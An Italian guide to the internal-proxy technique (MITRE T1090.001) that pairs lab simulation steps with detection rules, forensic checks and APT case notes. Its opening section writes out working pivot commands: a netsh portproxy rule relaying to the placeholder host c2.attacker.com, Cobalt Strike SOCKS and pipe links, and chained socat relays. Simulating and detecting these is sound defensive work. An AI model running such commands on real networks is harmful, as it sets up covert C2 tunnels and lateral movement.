Proxy Interni: Internal Proxy (T1090.001)

Per simulare un proxy interno in laboratorio, inizia configurando un sistema compromesso come relay point. Su Windows, il comando più immediato è netsh portproxy:

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=443 connectaddress=c2.attacker.com

Questo comando trasforma la macchina in un proxy che ascolta sulla porta 8080 e inoltra il traffico verso il server C2. Volt Typhoon ha utilizzato esattamente questa tecnica durante le loro operazioni.

Per scenari più complessi, Cobalt Strike offre funzionalità peer-to-peer native. Configura un beacon SMB sulla macchina vittima principale, poi collega altri sistemi compromessi:

beacon> socks 1080
beacon> link target-host \\target\pipe\msagent_12

Su Linux, socat rappresenta lo strumento più versatile per creare tunnel interni:

socat TCP4-LISTEN:8888,fork TCP4:internal-target:22

Questo comando crea un relay sulla porta 8888 che inoltra tutto il traffico verso il servizio SSH di un host interno. Per simulare comportamenti APT più sofisticati, concatena multiple istanze di socat su diversi host compromessi, creando una catena di proxy che oscura l'origine del traffico.

Gli attaccanti spesso utilizzano named pipes su Windows per comunicazioni host-to-host. Puoi replicare questo comportamento con PowerShell creando un server pipe su una macchina:

$pipeName = "evilpipe"
$pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName, [System.IO.Pipes.PipeDirection]::InOut)

E connettendoti da un altro sistema compromesso nella stessa rete. Questa tecnica è stata osservata in malware come MiniDuke e Stuxnet.

La detection di proxy interni richiede un approccio comportamentale che vada oltre le signature statiche. Concentrati su pattern di comunicazione anomali tra host interni che normalmente non comunicano tra loro.

Configura detection rules per monitorare processi Windows legittimi che iniziano connessioni inusuali. I processi rundll32.exe, svchost.exe e cmd.exe che generano traffico verso altri workstation interni dovrebbero triggare alert immediati. Utilizza Sysmon con la seguente configurazione per catturare network connections:

<NetworkConnect onmatch="include">
    <DestinationPort condition="is any">1080,8080,4444,8888</DestinationPort>
    <Image condition="contains any">rundll32;svchost;cmd</Image>
</NetworkConnect>

Per Linux, monitora l'esecuzione di comandi come socat, ssh -L, ncat attraverso auditd. Presta particolare attenzione quando questi tool vengono eseguiti da utenti di servizio come www-data o backup:

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/socat -k proxy_alert

Il volume di traffico interno è un indicatore chiave. Stabilisci baseline del normale flusso di dati tra segmenti di rete e alerta su deviazioni significative. APT28 durante la campagna Nearest Neighbor ha generato picchi di traffico SMB anomalo tra workstation che hanno permesso la detection.

Implementa correlazioni temporali tra l'esecuzione di nuovi processi e l'apertura di connessioni di rete. Un burst di connessioni interne subito dopo l'esecuzione di uno script PowerShell è un forte indicatore di proxy activity.

L'analisi forense di proxy interni richiede la ricostruzione del percorso completo del traffico attraverso la rete compromessa. Inizia identificando i pivot point attraverso l'analisi delle connessioni di rete nei log di Windows Firewall.

Cerca evidenze di port forwarding configurato tramite netsh nei registry artifacts. La chiave HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 contiene configurazioni persistenti di proxy che sopravvivono ai riavvii:

reg query HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /s

Le named pipes lasciano tracce distintive nel filesystem. Analizza la directory \.\pipe\ per identificare pipe non standard create da malware. Tool come PipeList di Sysinternals possono enumerare pipe attive durante l'incident response.

Per sistemi Linux, esamina i file di configurazione SSH per tunnel configurati. Il file .ssh/config degli utenti compromessi potrebbe contenere direttive LocalForward o RemoteForward aggiunte dagli attaccanti. Verifica anche la presenza di script in cron che riattivano tunnel caduti.

Durante Operation Wocao, gli attaccanti hanno utilizzato catene di proxy attraverso multipli sistemi compromessi. La ricostruzione della timeline ha rivelato che ogni hop aggiungeva circa 50-100ms di latenza, creando un pattern identificabile nei network flow logs.

Correlazione temporale è fondamentale. Mappa l'attivazione di proxy interni con altri eventi come lateral movement o data exfiltration. Lazarus Group tipicamente attiva proxy interni 24-48 ore dopo il compromesso iniziale, usando router compromessi come bridge tra segmenti di rete.

Turla rappresenta l'esempio più sofisticato nell'uso di proxy interni. Il gruppo compromette sistematicamente server interni con doppia interfaccia di rete, utilizzandoli come relay point per il traffico C2. La loro infrastruttura multi-tier può includere fino a 4-5 hop prima di raggiungere il server di controllo finale.

APT39 ha sviluppato tool custom per creare proxy SOCKS5 tra host infetti. Il gruppo preferisce questa tecnica per mantenere persistenza a lungo termine, spesso lasciando proxy dormienti che si attivano solo quando il canale C2 primario viene bloccato. I loro proxy utilizzano porte non standard nell'intervallo 40000-50000.

FIN13 mostra un pattern distintivo nell'implementazione di proxy. Compromettono inizialmente un singolo sistema con accesso internet, poi espandono lateralmente creando una rete mesh di proxy interni. Ogni nodo può comunicare con almeno altri due nodi, garantendo ridondanza.

L'analisi geografica rivela che gruppi APT cinesi come Higaisa tendono a riutilizzare le configurazioni proxy esistenti nel sistema vittima, mentre gruppi russi preferiscono installare propri tool di proxying. Questa differenza tattica può aiutare nell'attribuzione durante le prime fasi di un'investigazione.

Volt Typhoon ha introdotto una variante interessante utilizzando esclusivamente living-off-the-land techniques. Il gruppo sfrutta netsh e altre utility Windows native, rendendo la detection più complessa. Questo trend verso l'uso di tool legittimi per il proxying interno sta diventando dominante tra i gruppi APT più sofisticati.

La tecnica T1090.001 Internal Proxy è documentata nel framework MITRE ATT&CK. Le campagne SolarWinds Compromise, Operation Wocao e APT28 Nearest Neighbor forniscono case study dettagliati sull'implementazione real-world di questa tecnica.